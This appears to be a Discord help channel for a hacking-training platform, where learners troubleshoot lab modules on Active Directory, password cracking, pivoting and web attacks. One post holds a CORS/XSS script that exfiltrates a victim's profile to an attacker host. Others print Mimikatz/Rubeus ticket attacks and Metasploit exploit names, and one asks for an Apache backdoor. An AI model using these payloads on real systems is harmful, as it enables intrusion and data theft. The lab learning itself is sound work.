#modules

1 messages ยท Page 351 of 1

solar zodiac
#

can't js string follow the format string = 'string content'+variable ? why does it have to be string = 'string content'+variable+ '

dusty thorn
fathom pendant
thin citrus
#

I am working on the following exercise 'Parameter Logic Bugs -- > Code Review - Validation Logic Disparity':
Target(s): 94.237.60.154:51408
Try to locate both of the above functions, and then try to understand their main functionality, and see whether they are missing any validations that were performed on the front-end "thus leading to a logic disparity". Which of the two is more likely to be vulnerable? Use the function name as your answer.
I cannot select a date and view it source code, find whether they are missing any validations? Can someone help me with this?

fathom pendant
#

@rustic sage don't spoil anything from AEN; my only hint is making sure everything is capitalized appropriately

candid lily
#

c# is killing me help

#

it is only available for .net 4.0.0 which cannot be installed on new machines

thin citrus
#

Is someone available for my question?

split spear
#

ask the question

thin citrus
split spear
#

sorry mate, i haven't tackled that module yet

dapper moth
storm elk
#

Check the year

thin citrus
#

@storm elk I check the year also

#

Cannot go to the past it has only year 2024

candid lily
dapper moth
#

Haven't had any problems through the module

candid lily
#

were you able to install .net 4.7.2

dapper moth
#

Just a bit of digging through C#, which is not my strong suit

#

Are you using your own VM or the Module's?

candid lily
#

my own pc

dapper moth
#

Try the one from the Module

candid lily
#

even that one has .net 6.0 only

dapper moth
#

I haven't installed anything with the Module's VM actually. Just had to reference some other assemblies manually

candid lily
#

i downloaded it locally, i thought it would be a good learning experience to setup a exploit dev environment

neon torrent
#

How does one reset progress on the academy modules?

candid lily
#

you cant

neon torrent
dapper moth
#

It's a way ๐Ÿ‘€

neon torrent
digital dirge
#

hello!

#

allow me to speakin the general

final shale
#

Jeez was this password "&aue%C)}6g-d{w" really necessary for a module that we get the RDP credentials anyway... ๐Ÿ˜„

compact harness
#

Wassup hackers im an Aspriant

#

Can people Guide me on Ethical Hacking

obsidian scroll
#

Stuck at Oracle TNS.
So i connected to the database using user credentials, enumerated the server and I was supposed to query the server for name and password, where the name is 'DBSNMP'.
I have been querying tables left n right but no matches.
I don't have a way to escalate privileges and it seems unlikely for this module to do that.
Kindly help me as to what do i do to retrieve these records.

PS tried SQL queries with wildcards, didn't help

compact patrolBOT
earnest pasture
obsidian scroll
#

XE

#

that's the only one i found by bruteforcing

earnest pasture
obsidian scroll
#

Is there a different instance i should look for ?

obsidian scroll
#

Okay lemme give that a shot

karmic dirge
#

Thanks, although I have already finished the question hahah ๐Ÿ™‚

languid tundra
#

Is there anyone that can assist me on the takedown Sherlock? The last question on the TLSH it wonโ€™t accept the answer I found in VT

Feel free to dm me. I would greatly appreciate the help from someone

obsidian scroll
#

But i got the answer tho

earnest pasture
obsidian scroll
#

Haha nvm.
M just glad I got it.
Thanks for the help as always

karmic dirge
#

I did double check and it is possible to see that hint you added now

obsidian scroll
#

Wait.... the people who MADE these modules are on this SERVER ??

earnest pasture
obsidian scroll
#

The devs themselves are here!! Wow

#

That's crazy

azure falcon
#

ugh enum4linux y u take so long

valid gate
#

Can somebody from HTB check on the server for the Info Gathering - Web Edition Skills Assessment module? It's not working even after multiple resets. Can't even ping the server IP (and yes, I'm connected to the HTB vpn)

#

Saw a thread in here from 7/31 where @floral talon and another person were having the same issue despite doing everything right. I'm having the same issue unfortunately.

I added a line in my /etc/hosts file:
94.237.59.180 inlanefreight.htb

Yet I can't ping the IP, or open the URL in a browser with http://inlanefreight.htb:{PORT}

#

The other day I was able to brute force the subdomain for this module, but today I can't repeat what I did successfully.

odd pond
#

My vpn stopped working randomly last week and no matter how many times I download a new ovpn file and switch vpn severs, it hasnโ€™t started back working. Pwnbox saves the day

urban elk
valid gate
#

Just now I tried resetting over and over until I got a different IP on the same subnet and it's working now

candid lily
#

advanced deserialization skills assessment is more like a reversing challenge lol

dapper moth
candid lily
storm elk
#

check if there are any spaces at the front/back

#

glad to help ๐Ÿ™‚

iron oar
#

Anyone had issues with ADCS module, Certifried section, I cant modify the dNSHostName attribute of newly created machine account using bloodyAD or powerview.py

#

but it works when using certipy:

solar granite
#

Do we have a channel for suggestions/feedback?

acoustic owl
wispy violet
#

hey,This is the active directory introduction module, chapter AD Objects

#

im not sure of the correct regex to enter the answer,all variations of OU are not accepter

#

i got it

#

the multiple form of the word is needed

limpid hemlock
#

Hey

#

Can somrone help me with attackinge enterrize module lateral movement

#

I have managed to add ilfserveradmin to Administratos group using mimikatz

#

Now i need to read a flag in users administrator desktop but i cant seem to get into users administrator folder still now

fathom pendant
#

Also finish the module blind

#

Don't read or do the questions

#

Until after you get DC

onyx dust
#

has anyone done the fuzzing module?

#

is it good?

#

i am going to try it next to talk about with some of my friends who like that stuff but dont write/do htb modules.

fathom pendant
#

It's alright

#

Teaches the basics of web fuzzing

onyx dust
#

oh i thought it used harnesses? and afl

fathom pendant
#

Oh

onyx dust
#

was binary? i gotta look it was 500 cubes

fathom pendant
#

You're talking about the bin fuzzing module

#

I've heard its decent

onyx dust
cerulean hinge
#

Hello im facing an issue on ICMP Tunneling with SOCKS.

Here is the error message I get when running ptunnel-ng on the victim host :
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

I tried to add the packages but didn't work...

fathom pendant
#

You need to statically compile it before sending it over

cerulean hinge
fathom pendant
cerulean hinge
#

Great it worked thank you !

cerulean hinge
#

Is it really viable the double pivots part using SocksOverRDP ?
It was lagging a lot ! I took 10 minutes just to read the flag.txt...
I don't even imagine if you have to do a new enumeration, run some tools and so on

viral snow
#

Hi, I did the same thing but that didn't work. I changed VPNs and downloaded a new config file, but 172.16.8.0 just hangs, and then times out.

shadow canyon
#

I got local admin on both 15 and 25 . On 25 i run mimikatz and found fileshare and Isharefiles2023! Creds. Now im stuck at this point i m unable to use this anywhere.... But on DC there is a shared folder with read and write permission on it

pastel pawn
#

Bloodhound Module
Final SA Question: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).

I must be missing something easy. Total number of users is:
||15 for inlanefreight.htb
13 for AZusers
So 28 total||
I then do the math based on users with a path to Global admin ||4 || and no dice.

Can I get a sanity check please? Thanks!

Edit: For anyone that finds this in the future, after pulling their hair out like I did ๐Ÿ˜ƒ :

  1. The scope they are looking for is the total number of ||AZusers|| which can be found by looking at the ||database info|| tab in bloodhound.
  2. The answer they are expecting isn't rounded up.
    Example: 14.258 is rounded up to 14.26 in excel. In this case, the answer they are expecting isn't rounded i.e. (14.25)

Hope this helps!

limpid hemlock
#

Use ligolo to do port forwarding and then ping it proxychains is a bummer most times

viral snow
calm obsidian
#

Did anyone find the windows VM too slow in the section Thick Client Applications of the Attacking Common Applications module? I've been stuck on it for weeks and can't move past it. If it's allowed can someone DM me the answer so I can finish the module?

viral snow
ocean night
#

Well.. don't just show the steps.. try to guide them to discover the steps

#

If you wanna help someone, showing them the path with a map just gets them to the end. Guiding them via encouraging them ask the right questions themselves in order to come to the answers, that's the ticket.

viral snow
#

Anyone have time for a video chat that completed Attacking Enterprise Networks? Especially Exploitation $ Privilege Escalation? I've hit a wall, and I cannot for the life figure this one out.

cloud urchin
#

have you checked the module? it takes you through step-by-step on how to do it

jaunty grotto
#

Hey, can someone help me real quick? I just downloaded Kali linux and the codes on the terminal dont get highlighted when I type them its just plain white

#

How do I fix that?

cloud urchin
#

did you install the gui version? sounds like maybe you used bash instead of zsh

vernal elk
#

Hey guys not sure if this is the right channel for this, but ive been working on this for two days now and i cant find the answer to this question, any advice? This is the AD Enum and Attack path in the ACL Enum Module
Question:
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
Ive found that ||The user forend has the AddSelf and Generic Write|| rights over the GPO group, but putting it in the format ||Add-Self and Generic-Write|| doesnt give the answer, im pretty confused.

maiden field
#

Anyone having problem spawning target ?

gray yacht
vernal elk
# gray yacht What did you use to get this information?

Couple ways, inside the module they recommend turning the username into security principle and then using that in combination with PowerView to grab what ACLs we may have (Commands below), Then I grabbed all the info via sharphound and plopped it into bloodhound and took a look since that was another method they recommended to see what ACLs we may have.
Commands
||PS C:\Tools> $forendid = Convert-NameToSid forend ||
||PS C:\Tools> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $forendid} -Verbose ||

steel juniper
#

Hey having issues with Getting Started module I'm connecting to the VPN but when I ping the target I get nothing...

gray yacht
#

I remember having issues too and the only thing that fixed it on my end was switching to an EU VPN.

steel juniper
ocean night
steel juniper
#

Still nothing

cloud urchin
steel juniper
#

Oh... huh

#

Ok so I disconnected my vpn and it's still nothing

ocean night
#

Ok..

#

Remove :39160

#

That is the port number

#

Ping is attempting to resolve what you provided as a domain name, as it does not fit the format of an IP address

steel juniper
#

and it works now lol

ocean night
#

Whenever you see an IP with a : in, you're getting both the IP and the port number

steel juniper
#

ah whoops lol

shut wraith
#

Hello guys. Can you please confirm if this is a lie:

To extract sensitive information like cookies, local storage, or session storage data from http://10.129.28.25/phishing/, you need JavaScript executed within the context of that origin.

This means that you CANNOT send a malicious payload to the target which goes to the site that you want their cookies from and then send their cookies to your server?

Is this true ?

cloud urchin
#

it can be

#

i think it depends on the CORS policy, but i could be very wrong i'm weak with web stuff

fathom pendant
#

yeah it's a heavy it depends

shut wraith
#

Oh Okay. I am noticing much more as I am doing a deep dive into the vulnerabilities and attacks that Chat GPT does not know everything

fathom pendant
#

ChatGPT isn't a knowledge repository

shut wraith
#

Today alone it didn't know 2-3 things and it gave me code that was less efficient that a module

fathom pendant
#

it can be used to help explain something

novel matrix
#

Module: Windows Attack and Defense
Section: Print Spooler & NTLM Relaying
Issue: When I setup the ntlmrelayx on 1 terminal and setting up another terminal for dementor, I'm running into issues on terminal 1 with a bunch of errors once I've executed dementor. Anyone else run into that issue?

fathom pendant
#

Rem, have you tried not having skill issues? (i haven't done that one)

ocean night
#

There are other ways of sending requests to a host bypassing CORS and CSP, but that statement above suggests you would have a way to execute javascript within the context of the origin.

steel juniper
#

So I have another problem... it involves gobuster

ocean night
steel juniper
cloud urchin
# steel juniper

Your machine seems to have issues connecting to the web. Can you open a browser and reach Google or some other website?

steel juniper
#

Which is werid cause I've used gobuster before

cloud urchin
#

oh actually you got a 404 so it's connected

steel juniper
#

yee

cloud urchin
#

kali has gobuster preinstalled i thought? or maybe only mine cuz i downloaded the 'everything' version..

steel juniper
#

Ik I'm probs dumb how do I download it from the zip (I've done it before from my laptop when I had arch but it's been a bit)

cloud urchin
#

you download it and unzip it

steel juniper
#

ahh

shut wraith
cunning frigate
#

ADCS Attacks > Skills Assessment

I am stuck at the last question. I have got the jimmy user and found the vulnerability but I can not exploit it. Can anyone give a nudge. (DM is fine)

ocean night
cloud urchin
cunning frigate
cloud urchin
cunning frigate
steel juniper
#

unzipped it how do I run the .exe

#

my brain is stinky

cloud urchin
#

you aren't going to run an .exe file in linux, that's for windows. you need to download the linux binary

#

then chmod +x it

#

gobuster wasn't preinstalled in kali for you? did you get some bare bones version? i always get the full version and it comes preinstalled for me, but i would imagine gobuster comes with the smaller versions

steel juniper
#

idk what happened to it

steel juniper
#

I'm just gonna make another vm fresh

red shuttle
#

wow, didnt get part with script
can i dm for that?

steel juniper
#

ok got gobuster running and also for some reason it just won't install on the other vm but will with this one HahAHa

#

ok now how do I get wordlists?!

cloud urchin
steel juniper
#

Guess my version doesn't have seclists I'm just gonna download it idk why Kali hates me today

cloud urchin
#

apt install seclists

steel juniper
#

already on it lol

cloud urchin
#

you must be downloading some barebones kali version

#

get the 'everything' version

steel juniper
#

I mean I got it off the official website via an image file

cloud urchin
steel juniper
#

ok got it to were it needs to go...now

#

AHHH IT WORKS FINALLY!!!

novel matrix
steel juniper
#

and now I can't get the website when I type it in...๐Ÿซ 

cloud urchin
steel juniper
#

I'll try it

steel juniper
cloud urchin
#

it probably despawned or wrong port

steel juniper
#

ok running gobuster then trying again

#

got a 404 error

#

oh wait..

cloud urchin
#

404 means not found, so you connected to the server

#

check the url

steel juniper
#

welp I figured it out

storm elk
#

The /47/ seems a bit odd imo

steel juniper
storm elk
#

It happens ๐Ÿ˜„ youโ€™re all set now

steel juniper
#

Sorry if I'm a goober

storm elk
#

Youโ€™re not and no need to be sorry

steel juniper
faint hamlet
#

I have a query regarding Intro to Network Traffic Analysis module Tcpdump Fundamentals section question # 4.

Why is sudo even required when we are just reading from a file? It does not feel intuitive to me, had to lookup the answer after several failed attempt.

worthy mantle
#

Hi guys, I have a question, which system is the best? Windows 11 pro or kali linux? What do you think? I bought a new laptop and I am undecided which one I should prefer.

cloud urchin
#

win 11 with a vm running kali

faint hamlet
#

Win 11 with wsl 2 kali

steel juniper
#

So is gobuster suppost to go slow with dns search?

pliant coyote
#

Do you guys recommend using msf bounce shell or just nc bounce shell?

hard phoenix
#

I (for the life of me) CANNOT get ReconSpider to work on the skills assessment of the Information Gathering - Web Edition module. Losing my mind

fathom pendant
#

like that's a super vague thing

final shale
hard phoenix
#

oops that screenshot technically spoils

urban elk
#

hi all, I need some clarification. The module is Password Attacks, I'm in the Windows Pass the Ticket section (https://academy.hackthebox.com/module/147/section/1639). The Mimikatz command for "Pass the Key or Overpass the Hash" is exactly the same as the one demonstrated in the previous section for a simple "Pass the Hash". I'm trying to understand what the difference is, is it the context? Kerberos vs "simple" NTLM in each case respectively?

PS: reading ahead and checking the recommended reading of https://github.com/GhostPack/Rubeus#example-over-pass-the-hash makes me more confused - it seems like the method presented for Mimikatz PtH (sekurlsa::pth) is actually an Overpass...

GitHub

Trying to tame the three-headed dog. Contribute to GhostPack/Rubeus development by creating an account on GitHub.

#

ok, if I understand correctly,

  • mimikatz' sekurlsa::pth is effectively an Overpass;
  • in the process, it "injects" the NTLM hash into your session;
  • for NTLM-based authentication scenarios, this will be sufficient, and we've effectively performed PtH;
  • for kerberos, it will then use the NTLM hash to get a ticket and Overpass the Hash.
#

please let me know if I got any of that wrong, or even just mildly incorrect

astral ravine
#

what's the difference between parrot security & parrot htb edition (?)

urban elk
opal nexus
#

Does anyone else has his support box gone?

astral ravine
#

what'll be the benefits?

astral ravine
fathom pendant
fathom pendant
opal nexus
fathom pendant
opal nexus
eternal vigil
#

xrdp , remmina aree not working while trying to rdp into a windpws session from my virtualbox even when using openvpn while it flawlessly works in pwn isntance but it gets super slow and annoying in pwn instance , is there any alternative ???

cursive pecan
#

Hi guys, I'm currently stuck on Suricata Rule Development Part 2 (Encrypted Traffic) | Working with IDS/IPS, on this question: "There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer." Any help would be great .

vague pier
#

Hi everyone, I need some help with HackTheBox. I am trying to do the linux fundamentals module and now i am at the system information part, where I need to ssh an VM. I have an virtual machine of Ubuntu where I am trying it, but it just says: ssh: connect to host 10.129.174.64 port 22: Connection refused

astral ravine
#

I'm having issues in connecting with Openvpn of meow machine in htb. It's just showing 'Creating Instance' & then doesn't show up anything

worthy escarp
# vague pier Hi everyone, I need some help with HackTheBox. I am trying to do the linux funda...

Maybe this will help? First check openssh-server installed in that system.

check the status of ssh service, make ssh service start.

sudo service ssh status
sudo service ssh start
Check whether port 22 in that system is blocked by iptables. Just allow port in iptables and then check.

sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT
Else change port number of ssh from 22 to 2222 by editing

vi /etc/ssh/sshd_config
/etc/init.d/ssh restart.

vague pier
worthy escarp
fathom pendant
fathom pendant
rustic sage
#

Hey all, I'm on the Getting Started module - Knowledge Check section. I've been able to get my foothold both manually and via metasploit. I've also rooted the box using sudo -l - GTFObins method. I'm trying to find the second privilege escalation method.

What I've tried:
I've run linpeas and linenum and nothing is screaming at me.
Attempted to view bash history of the user. Permission Denied.

Attempted to view successful sudo of user. Permission denied.

Attempted sudo exploit against a known vulnerable version. Says it's not vulnerable.

I've run dpkg -l, not positive how to approach pinpointing vulnerable software. If it is here let me know how I can work through finding it.

Also tried to see if I could loot the id_rsa key with no luck.

Anyone have any hints?

urban elk
#

still in the Windows Pass the Ticket section of Password Attacks (https://academy.hackthebox.com/module/147/section/1639). I've answered the last question with Mimikatz, but Rubeus is failing to ptt:

C:\tools>Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:<prettysureit'stherighthash-butI'vetriedthemallIthink> /ptt

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: <thehash>
[*] Building AS-REQ (w/ preauth) for: 'inlanefreight.htb\john'
[*] Using domain controller: 172.16.1.10:88

[X] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:

C:\tools>

Any clue?

#

I'm still googling it but not having much luck, will try a reset if you can't think of anything

dusty path
#

Attacking common applications
Coldfusion enum
I nmaped port 5500 and submitted the protocol under the service column but it seems wrong

Any clue? Some help please... have been tryingn to ennumerate really really hard

faint geode
dusty path
#

@faint geode could i dm in regards to this?

faint geode
urban elk
tardy estuary
compact apex
#

can you provide the full command you are using

fathom pendant
tardy estuary
tardy estuary
fathom pendant
#

Try resetting the target

compact apex
#

๐Ÿ‘†๐Ÿป

tardy estuary
# fathom pendant Try resetting the target

-S sudo service ssh status
โ€ข ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: disabled)
Active: active (running) since Tue 2024-11-12 13:23:02 GMT; 35min ago
Invocation: a509202877fc4d96961d9391157df943
Docs: man: sshd(8)
man: sshd_config(5)
Process: 8028 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)
Main PID: 8032 (sshd)
Tasks: 1 (limit: 2203)
Memory: 316K (peak: 1.7M swap: 1.1M swap peak: 1.1M)
CPU: 14ms
CGroup: /system.slice/ssh.service
-8032 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
Nov 12 13:23:02 vbox systemd[1]: Starting ssh.service - OpenBSD Secure Shell server...
Nov 12 13:23:02 vbox sshd[8032]: Server listening on 0.0.0.0 port 2222.
Nov 12 13:23:02 vbox systemd[1]: Started ssh.service - OpenBSD Secure Shell server.
Nov 12 13:23:02 vbox sshd[8032]: Server listening on :: port 2222.
โ€ข(matias@ vbox)-[~/Downloads]
โ€ข$ ssh -p 2222 kali@10.129.239.128
ssh: connect to host 10.129.239.128 port 2222: Connection refused

compact apex
#

can you ping the target ?

tardy estuary
#

yes ping is working on the target IP

#

its the same on both virtual machines - kali and parrot linux have same error

compact apex
#

ssh -p 22 kali@10.129.239.128 ?

fathom pendant
#

Htb-student usually

compact apex
#

your ssh server is listening on port 2222 wich is unusual but wathever is should not be a problem when you try to reach another host

compact apex
tardy estuary
#

and the command used is ssh kali@IP

compact apex
compact apex
#

wrong channel buddy try contacting the official support

winter schooner
compact apex
tardy estuary
compact apex
tardy estuary
fathom pendant
#

And that it's a PITA

tardy estuary
#

I have no problem doing the remote desktop for windows machine but ssh to kali is like I have shown ๐Ÿ˜ฆ

#

I will try using pwnbox but it was always very laggy for me

#

Same thing on Pwnbox ๐Ÿ˜ฆ

rugged parrot
#

Hi guys, can anyone help me with this question in "Tcpdump fundamentals" https://academy.hackthebox.com/module/81/section/774 please? In the 4th question one shall name the command for printing the packets from a file in hex and ascii. AFAIK and the man pages, with the given file the solution should be "tcpdump -Xr /tmp/capture.pcap", but this answer is rejected, regardless whether or not providing "tcpdump" as "/usr/bin/tcpdump" or omitting it completely, regardless how to order the switches. Which is the requested answer?

urban elk
agile hare
#

Hi everyone,

I'm feeling a bit stuck and disheartened trying to figure out the expected format for the first question in the "Skills Assessment" of the "Stack-Based Buffer Overflows on Linux x86" module.

The question asks: "Determine the file type of 'leave_msg' binary and submit it as the answer."

I've used both the file shell command and the info file command in GDB to gather information. However, the exact and complete output of the file command does not fit in the answer field. I've tried several variations of what I believe to be the important bits of information (e.g., Linux ELF 32-bit i386), but none have been accepted.

Could anyone clarify:

  1. Is there a specific format expected for the answer?
  2. Do I need any additional tools or steps beyond file and info file to determine the file type?
    I'd really appreciate any guidance or suggestions! Thanks in advance. ๐Ÿ˜Š
rustic sage
sour lake
#

Can someone help me with the CORS Misconfiguration exercise in the Advanced XSS and CSRF Exploitation Module?

I have found the vulnerability that it is reflecting the Origin but I can't seem to find a way to exploit it.

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', true);
xhr.withCredentials = true;
xhr.onload = () => {
location = 'https://exfiltrate.htb:42219/log?data=' + btoa(xhr.response);
};
xhr.send();
</script>

dark hedge
upper haven
# sour lake Can someone help me with the CORS Misconfiguration exercise in the Advanced XSS ...

Take another look at the section. Particularly the end of the section. Additionally, it is generally good practice to test the payload out yourself before submitting it to the victim. If you try to get your payload to work, your browser will tell you why it isn't working. You don't have to remove the port from the payload, if you get a payload to work on your own session, you can submit it as is and it'll work on the victim as well ๐Ÿ™‚

delicate ermine
#

Hi,
I am new around here and I try to finish the last bash script from https://academy.hackthebox.com/module/21/section/128

but I can't validate the answer: 25223. Is wrong?

#!/bin/bash

# Decrypt function
function decrypt {
    MzSaas7k=$(echo $hash | sed 's/988sn1/83unasa/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4d298d/9999/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/3i8dqos82/873h4d/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/4n9Ls/20X/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/912oijs01/i7gg/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/k32jx0aa/n391s/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/nI72n/YzF1/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/82ns71n/2d49/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/JGcms1a/zIm12/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/MS9/4SIs/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/Ymxj00Ims/Uso18/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/sSi8Lm/Mit/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/9su2n/43n92ka/g')
    Mzns7293sk=$(echo $MzSaas7k | sed 's/ggf3iunds/dn3i8/g')
    MzSaas7k=$(echo $Mzns7293sk | sed 's/uBz/TT0K/g')

    flag=$(echo $MzSaas7k | base64 -d | openssl enc -aes-128-cbc -a -d -salt -pass pass:$salt)
}


var="9M"
salt=""
hash="VTJGc2RHVmtYMTl2ZnYyNTdUeERVRnBtQWVGNmFWWVUySG1wTXNmRi9rQT0K"

# Base64 Encoding Loop
for i in {1..28}
do
    var=$(echo -n "$var" | base64)
done

# Assign salt as the length of the 28th hash
salt=${#var}

echo $salt
# Check if $salt is not empty and run decrypt
if [[ ! -z "$salt" ]]
then
    decrypt
    echo $flag
else
    exit 1
fi
sour lake
#

Thanks for the help guys, I'll have another look

sour lake
silver marten
#

a

jade lava
#

Linux Privilege escalation, Kernel Exploits. When I try to run any of the exploits I find I have :
bash: ./exploit.sh: /bin/sh^M: bad interpreter: No such file or directory
I am not sure what's the problem, do I need to compile .sh file like .c? Or just chmod +x is enough?

pine dune
#

hi guys on the password attack module for "Attacking LSASS", how do we transfer the lsass.dmp file to our own machine?

#

it told us in the previous module (attacking SAM) but it didnt make sense to me for how we could do it for lsass because that was for SAM

limpid hemlock
#

Hey im running inveigh to cature hases in enterprize module lateral movement and its been some time i havent got any hash anyone knows anythinh

urban elk
limpid hemlock
#

?mm

gray yacht
terse epoch
#

someone has apache/2.4.6 backdoor?

#

security test

quasi wave
#

for the shadow file section under the linux chapter of password attacks module, I'm having trouble with the last step.

I am trying to unshadow the shadow file. I tried doing it via ssh on target machine it wouldn't work because I didn't have permission to install john the ripper. I then FTP downloaded the unshadowed hashes. hashcat isn't working on the unshadowed hashes tho. Here's my latest terminal output on the pwnbox after using FTP get request to download unshadowed hashes from the target successfully:

โ”Œโ”€[us-academy-1]โ”€[10.10.15.20]โ”€[htb-ac-605555@htb-ogdmpk3m8h]โ”€[/usr/share]
โ””โ”€โ”€โ•ผ [โ˜…]$ hashcat -m 1800 -a 0 /tmp/unshadowed.hashes /usr/share/wordlists/rockyou.txt -o /tmp/unshadowed.cracked
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD EPYC 7543 32-Core Processor, skipped

OpenCL API (OpenCL 2.1 LINUX) - Platform #2 [Intel(R) Corporation]
==================================================================
* Device #2: AMD EPYC 7543 32-Core Processor, 3919/7902 MB (987 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashfile '/tmp/unshadowed.hashes' on line 1 (Please ask your administrator.): Separator unmatched
No hashes loaded.

Started: Tue Nov 12 15:00:23 2024
Stopped: Tue Nov 12 15:00:23 2024
#

what's with that part about "Please ask your administrator?"

#

can someone hint me in the right direction here?

#

also what's with no hashes loaded

urban elk
limber river
quasi wave
quasi wave
#

wait, that's the contents of the file?

urban elk
#

yep ๐Ÿ™‚

#

but shouldn't be

quasi wave
#

then where are the hashes?

limber river
urban elk
#

my guess is whatever you used to generate unshadowed.hashes failed, giving that as output. Just transfer both /etc/passwd and /etc/shadow to your machine, and unshadow there

dapper moth
quasi wave
#

unless I transfer to the tmp folder but then I look and the files aren't there

urban elk
#

slow down a bit. You can ssh into the machine, and you can read the files, correct ?

quasi wave
#

yes

#

oh I see so I can just copy-pasta

urban elk
#

that's always an option, yes. But you can also scp

#

(among many other options, see the File Transfers module, but that's the most obvious one)

quasi wave
#

ok now hashcat is cracking password but is it really gonna take seven hours?

terse epoch
#

exploit/linux/http/apache_solr_backup_restore

#

exploit/multi/misc/apache_activemq_rce_cve_2023_46604

quasi wave
#

I'm gonna have the pwnbox running for a while

fathom pendant
fathom pendant
#

It generally takes way less time

quasi wave
fathom pendant
#

Also pwnbox lifetime can't be extended past 6 hours

quasi wave
#

ok ya makes sense so would be kind of pointless if it took that long

#

but I think that I will take a break then while its cracking this

#

I will need to get some food for sure

#

am I on the right track if I got hashcat working at least?

#

like am I doing the right thing?

fathom pendant
#

It takes ~30 at most in many situations

quasi wave
#

ok thanks

#

IRL too or mainly on Hack the Box?

#

or generally?

jade lava
#

SQL Injection module. Connect to the database using the MySQL client from the command line. Use the 'show databases;' command to list databases in the DBMS. What is the name of the first database?

โ”€โ”€(kaliใ‰ฟkali)-[~]
โ””โ”€$ mysql -u root -h 94.237.50.65 -P 39892 -ppassword
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

fathom pendant
quasi wave
#

Ok what about IRL?

#

Iโ€™m just curious

soft reef
jade lava
quasi wave
#

ok so its 8% of the way through and hashcat hasn't found it yet

#

should I give it 20 more minutes?

#

is the guess queue the queue that determines if all passwords have been cracked? I don't mean to ask something stupid

#

it also says recovered 0/4

fathom pendant
#

0/4 means of the 4 hashes, none are cracked

quasi wave
#

ok

#

it was running for 38 minutes

#

it didn't crack any of them

fathom pendant
#

Then perhaps, wrong list

quasi wave
#

ok

#

ya I will try again later

#

maybe the list in resources is more practical

#

will try that one soon

#

wait hold on

#

I'm trying list in resources to see if it will work better

#

nope went through whole list didn't work

#

what is the right wordlist?

#

hold on

#

I think what I have to do is mutate the wordlist in the resources

#

how do I do that?

#

ok I think I am gonna solve it

#

I mutated the password list so now I think its a matter of waiting

#

I think I actually am gonna have mostly solved this on my own

foggy monolith
#

Is it just me or does x64dbg always take FOREVER to open? Because now that I'm onto the Thick Client section of Attacking Common Applications, if I double click the x64dbg icon on the Remote Desktop, nothing happens for like a minute and a half.

quasi wave
#

solved

#

I actually finished it on my own. I feel really good about myself.

#

gonna try doing the next section on my own

foggy monolith
#

Am I supposed to look in ntdll.dll for this runas knockoff? Because the actual memory layout looks nothing like the module screenshots either.

fathom pendant
foggy monolith
#

If you mean "check Exit Breakpoint and uncheck everything else" then yes.

foggy monolith
#

Why therefore is the layout of the file so different from the module?

#

The exit breakpoint is taking me to ntdll.dll. Why?

safe star
#

@compact matrix you dont need the <>

compact matrix
#

just realised :/

safe star
#

remove the spaces too

#

just in case

compact matrix
#

ah yes worked without the spaces

#

thats gonna take some time

#

I dont think im doing this right

safe star
#

you're getting errors tho

compact matrix
#

i already got the subdomains I dont need to fuzz them from the word list

safe star
safe star
viral snow
#

Hey guys, I'm in Attacking Enterprise Networks - Exploitation & Privilege Escalation. Has anyone experienced the web page in the exercise continuously time out? I logged in with the Admin credentials, and as I was navigating through the exercise, the web page timed out on me three times.

Did anyone else go through this? How did you fix it? I don't want to keep starting over and over.

shut wraith
#

Hello can anyone familiar with JWT tokens please come to the VC?

#

Nvm I figured it out

foggy monolith
shy cave
#

Hi there, I am in Broken Authentication module. In that module, in Brute-Forcing Password Reset Tokens, how can I take over another user's account which is in the last question?

celest sigil
#

hello , anyone have any tips on how to RDP? I keep getting a login failure and I am using this command: xfreerdp /v:<target ip> /u:htb-student

cloud urchin
#

add a password? /p:<password>

celest sigil
#

having trouble with this question as well if anyone has any advice: Section: Windows Privilege Escalation > User Account Control

Q: Follow the steps in this section to obtain a reverse shell connection with normal user privileges and another which bypasses UAC. Submit the contents of flag.txt on the sarah user's Desktop when finished.

cloud urchin
celest sigil
#

not understanding how to preform an RDP - am i missing the /p:<password> in the command?

cloud urchin
#

try it and see if it works

#

hard to say why you can't without the error

storm elk
#

Try to do it with Remmina

severe arrow
#

